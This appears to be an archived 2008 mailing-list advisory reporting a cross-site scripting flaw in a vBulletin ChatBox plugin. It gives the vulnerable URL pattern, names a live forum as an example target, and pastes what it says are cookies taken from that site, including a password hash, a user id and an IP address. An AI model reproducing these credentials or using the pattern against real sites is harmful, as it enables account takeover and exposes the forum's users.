Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171

NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

PHP Live Helper <= 2.0.1 Multiple Vulnerabilities

munky-bliki lfi

From:	Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date:	18.08.2008
Subject:	Vbulletin Plugin ChatBox Xss Vulnerability

####################################### Vbulletin Plugin ChatBox Xss Vulnerability   #
Discovered By Alemin_Krali# al3m@bsdmail.org                          # www.al3m.blogspot.com    
# Greetz : BeyazKurt,Kerem125,Cr@zy_King,Ercu_145,Abo Mohammed (Net Devil)# High Risk
Vulnerability! Xss Working!######################################note:You login site and xss try.
Ex:
http://www.localhost/misc.php?do=ccarc&cbt=xss
Example Site:
http://www.megaturks.net/forum/misc.php?do=ccarc&cbt=xss
and cookie
XSS acigi bulunan site=> www.megaturks.net — 16.08.2008 22:01 de kayit edilmistir. IP Adresi:
78.163.55.84 (whois)Cookies: bblastvisit=1218911541; bblastactivity=0;
bbforum_view=fcef3869fbbf346863082895ed158bd5de6700a1a-2-{i-170_i-1218911557_i-
158_i-1218911699_};bbpassword:
7750c66b19631528799b516d65de5ef1;bbuserid=9524;bbthread_lastview=f0d6496e44c2b0af
6b488fb24676aca245e8e60aa-1-{i-11619_i-1218911714_}
this big lammer center:)
a bugs life!
###########################################

_________________________________________________________________
Windows Live Spaces – hayatınız, Alanınız. Daha fazlasını öğrenmek için buraya tıklayın.
http://get.live.com/spaces/overview